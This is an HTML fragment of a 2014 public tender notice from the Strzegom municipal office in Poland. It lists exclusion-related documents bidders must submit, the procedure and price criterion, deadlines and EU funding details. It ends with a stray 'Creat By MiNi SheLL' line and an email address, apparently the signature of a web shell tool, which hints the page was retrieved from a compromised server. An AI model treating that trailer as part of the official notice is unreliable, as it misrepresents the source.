<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian określa wzór umowy w sprawie zamówienia publicznego stanowiący załącznik do SIWZ. Zgodnie z art. 36 ust. 1 pkt  16 Pzp wzór umowy stanowi treść SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Strzegomiu, Rynek 38, 58-150 Strzegom Wydział Obsługi Interesanta pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 11:30, miejsce: Urząd Miejski w Strzegomiu, Rynek 38, 58-150 Strzegom Wydział Obsługi Interesanta pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 1 przewidziane jest do dofinansowania z udziałem środków  Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (Priorytet IX Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com